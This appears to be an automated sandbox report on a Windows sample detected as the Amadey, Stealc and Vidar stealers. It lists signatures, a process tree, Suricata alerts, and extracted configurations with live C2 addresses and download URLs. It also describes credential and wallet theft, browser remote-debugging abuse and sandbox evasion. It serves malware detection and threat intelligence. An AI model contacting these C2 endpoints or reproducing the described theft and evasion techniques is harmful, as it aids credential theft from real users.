Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1561352
MD5:	9f1e2f4308ddb08ce70a669d67a97763
SHA1:	fa3222ecc5bc0e59f5bcd16562bdc0cb9be9f1ee
SHA256:	f4a38bfe6d64ae092c608adf24f3b294710aacc510f628c4e19e1a1800fb42b8
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

Maps a DLL or memory area into another process

Monitors registry run keys for changes

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2128 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9F1E2F4308DDB08CE70A669D67A97763)

chrome.exe (PID: 5536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2196,i,8775659685558455544,10122295161962970873,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 7936 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 3976 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2012,i,9669449525995071965,9129735360253068169,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

cmd.exe (PID: 9184 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAFHCGIJE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 9012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsJDAFHCGIJE.exe (PID: 9076 cmdline: "C:\Users\user\DocumentsJDAFHCGIJE.exe" MD5: 7E87644426BB54D86265DD3C83727973)

skotes.exe (PID: 8512 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 7E87644426BB54D86265DD3C83727973)

msedge.exe (PID: 8156 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 7312 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

identity_helper.exe (PID: 8744 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)

identity_helper.exe (PID: 8756 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)

msedge.exe (PID: 8792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5292 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8812 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=3404 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 6500 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7144 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

skotes.exe (PID: 352 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 7E87644426BB54D86265DD3C83727973)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000003.2652499898.00000000050E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001A.00000003.2691326542.00000000050A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000002.2692770432.0000000000B11000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.2152563709.0000000004B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2662760280.0000000000F31000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2662001774.000000000061E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001A.00000002.2731767525.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001C.00000002.3386405768.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001C.00000003.3258434469.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: file.exe PID: 2128	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 2128	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 2128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2128	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
25.2.DocumentsJDAFHCGIJE.exe.b10000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
28.2.skotes.exe.3f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
26.2.skotes.exe.3f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2128, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 5536, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:09:16.117116+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49717	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:09:15.996127+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.6	49717	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:09:16.437538+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.6	49717	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:09:17.969053+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.6	49717	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:09:16.558782+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49717	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:09:15.554629+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49717	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:11:06.444510+0100	2856147	1	A Network Trojan was detected	192.168.2.6	56481	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:09:04.092640+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	56488	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:11:10.979191+0100	2803305	3	Unknown Traffic	192.168.2.6	56493	31.41.244.11	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T07:09:18.771114+0100	2803304	3	Unknown Traffic	192.168.2.6	49717	185.215.113.206	80	TCP
2024-11-23T07:09:41.226869+0100	2803304	3	Unknown Traffic	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:43.291915+0100	2803304	3	Unknown Traffic	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:44.633834+0100	2803304	3	Unknown Traffic	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:45.932449+0100	2803304	3	Unknown Traffic	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:49.672517+0100	2803304	3	Unknown Traffic	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:50.824547+0100	2803304	3	Unknown Traffic	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:56.551524+0100	2803304	3	Unknown Traffic	192.168.2.6	49944	185.215.113.16	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllw3	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php~Q=	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllm0	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllJ	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpZd	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpSd	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpY	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000019.00000003.2652499898.00000000050E0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: file.exe.2128.0.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CABA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB44C0 PK11_PubEncrypt,	0_2_6CAB44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA84420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CA84420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB4440 PK11_PrivDecrypt,	0_2_6CAB4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CB025B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CA9E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA98670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CA98670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CABA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CADA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CAE0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CAB43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CAD7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CADBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA97D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CA97D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CAD9EC0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.147.12:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.158.90:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:56418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:56442 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2692174444.000000006FD5D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2692174444.000000006FD5D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
